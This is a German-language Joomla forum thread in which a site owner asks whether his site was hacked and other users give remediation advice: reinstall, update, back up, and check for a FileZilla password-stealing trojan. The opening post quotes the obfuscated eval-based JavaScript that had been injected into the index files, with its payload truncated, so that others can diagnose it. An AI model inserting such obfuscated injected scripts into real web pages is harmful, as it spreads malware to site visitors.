Ist meine Seite gehackt worden?

**Pepu78** · 09.02.2012 09:27

Ich hatte heute morgen ein böses Erwachen als ich meine Homepage besuchte.
Erstens bekam ich von Antivir mehrere Virennachrichten und zudem wurde die Seite nicht richtig angezeigt und man konnte auch nicht scrollen und somit blieb der untere Teil der Beiträge verschwunden.

Ich hab dann in den index Dateien im Hauptordner von Joomla und bei den Templates sowie beim Administrator immer Codes gefunden, die beim Vergleich zu einer früheren Version, nicht vorhanden waren.
Als ich diese Dateien mit den früheren Daten ausgetauscht habe, funktionierte die Seite wieder fehlerfrei im fronted sowie im backend.

Meine Frage ist jetzt, bin ich gehackt worden oder gibt es auch andere Wege, wie sowas passiert? Und reicht es die Dateien zu ersetzen?
Ich benutze derzeit Joomla 1.5... Hatte immer Angst davor bei einem Update meine Daten zu verlieren, da er mir immer Fehlermeldungen beim nachschauen von Updates anzeigte~

Vielen Dank schon mal für eure Antworten.

Hier ist der Code von einer der Dateien, die ich ersetzen musste:

Code:

<html><body bgcolor="#FFFFFF"><!--1b841a--><script>if(window.document)aa=([window][0]+[]).substr(0,2);aaa=(document+[]).substr(0,2);if(aa===aaa){ss='';s=String;12-function(){e=eval;}();t='w';}h=-2;n=["...........plit(t);for(i=0;i-n.length<0;i++){j=i;ss=ss+String.fromCharCode(-h*n[j]);}if(aa===aaa)e(ss);</script><!--/1b841a-->
</body></html>

Vorher sah sie so aus^^:

Code:

<html><body bgcolor="#FFFFFF"></body></html>

**blackice2999** · 09.02.2012 09:32

Hi,

jupp Du wurdest gehackt. Was Du nun zu tun hast findest Du unter anderem in "Flottes Sicherheitsliste" oder in der Joomla FAQ - gehe damit nicht zu nachlässig um. Mit einer gehackten Seite ist nicht zu spaßen.

Gruß Dennis

**Lacki** · 09.02.2012 09:36

Hallo.
Die schlechte Nachricht, ja Du wurdest gehackt. Leider bist Du genau entgegengesetzt zu jeder Sicherheitsempfehlung vorgegangen. Updates beheben oft Sicherheitslücken, sie nicht einzuspielen sorgt eben dafür, dass man leichter gehackt werden kann. Und falls mal ein Update schief läuft, spielt man eben sein vorab gemachtes Backup wieder ein, das ist gängige Praxis und hier vielfach beschrieben. Das war die leider notwendige Standpauke.

Jetzt reicht es nicht, einfach nur die index.php wieder herzustellen (Der Hacker hat weiterhin Zugriff und kann weiter Deinen Besuchern u. a. Schadcode und Viren unterschieben). Entweder nach Abschnmitt 2.6 der FAQ und der darin verlinkten Liste Punkt für Punkt vorgehen (dazu braucht es Erfahrung und ein sauberes Backup, alternativ Experten beauftragen) oder gleich alles löschen und neu mit der aktuellsten Version beginnen.

EDIT: Hi Dennis, mehr Text braucht mehr Zeit

**Pepu78** · 09.02.2012 10:05

Danke für die schnellen Antworten.
Ich werde wohl alles löschen und neu auflegen (Dieses mal mit Joomla 2.5^^), da es wohlmöglich die schnellste Variante ist.
Meine Frage dazu ist jetzt noch: Kann ich die Html-Codes aus den alten Beiträgen einfach kopieren und beim neuen Joomla einfügen?
Der Code der Beiträge sollte ja keine Schadsoftware enthalten oder? Ich seh ja, was ich da kopiere und weiß was da richtig ist und was nicht~

Zu den Backups und der alten Version. Ich war mir dieses Sicherheitsrisiko bewusst. Ich hab manuell immer alle Daten vom Server kopiert, um überhaupt ein Backup zu bekommen. Ich habs leider nicht geschafft eines der Addons für Backups ohne Fehler zum Laufen zu bekommen. Irgendwas ging immer nicht und somit konnte ich es nicht verwenden. Und so hatte ich nie ein Datenbankbackup. Und aus diesem Grund hatte ich dann wiederum Angst vor einen Totalverlust bei einem Update^^

Könnt ihr mir ein gutes Addon bei Joomla 2.5 empfehlen, mit dem man einfach komplette Backups+Datenbankbackups erstellt und diese auch wieder aufspielen kann? Es müsste leicht zu bedienen sein, da ich es wie erwähnt, nie zum Laufen bekommen habe

**albatros** · 09.02.2012 10:34

Hi,

AkeebaBackup ist beliebt und gibt es auch für 2.5. Ich benutze immer Filezilla für die Dateien und bevorzugt den MySqlDumper für die DB. Es geht aber auch mitPHPmyadmin.

hth

albatros

**justforhelp** · 09.02.2012 13:43

Nicht deine Seite wurde gehackt - nicht im herkömmlichen Sinne. Zumindest ist das unwahrscheinlicher als folgendes:

Du hast zu 99% Wahrscheinlichkeit einen Trojaner auf deinen PC, der deine gespeicherten Passwörter in Filezilla (das benutzt du doch oder?) ausgelesen hat und dann gezielt index.html oder generell Dateien auf dem ftp-Server sucht und dann im body-Tag so etwas hinein schreibt.

Ich schlage vor, dass du als allererstes deinen Computer mit einer Notfall-CD von Kaspersky und danach am Besten noch mit der Notfall-CD von Avira durchchecken lässt. Kaspersky findet als einziger Virenscanner den von dir beschriebenen Zustand (Wenn ich mit meiner Vermutung richtig liege).

Dann suchst du nach der Filezilla-Passwort-Speicher-Problematik(sofern du es nutzt) und schaltest die automatische Speicherfunktion der Passwörter ab.

Dann änderst du die Passwörter bei deinem Provider.

Eine Garantie, dass es die einzige Veränderung auf der Seite ist gibt es nicht, darum auf jedenfall ein Backup einspielen und auf die neusten Versionen updaten.

Viel Glück bei der Sache!

PS: Falls du Angst vor Updates hast: Immer vorher eine Sicherheitskopie von der SQL-Datenbank und dem Webverzeichnis anfertigen, dann kann schon nichts passieren.

EDIT: Konnte nun selbst so ein Fall Analysieren... scheint wohl grad ziemlich um zu gehen. Leute, umbedingt den Filezilla-Speicherautomatismus lahm legen!!! Das Virus um das es hier geht hat sich auf FileZilla spezialisiert und liest dort die Daten aus.

Thema: Ist meine Seite gehackt worden?

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Ist meine Seite gehackt worden?

Erhielt Danksagungen von:

Erhielt Danksagungen von:

Was - nein wer wurde gehackt....

Lesezeichen

Lesezeichen

Berechtigungen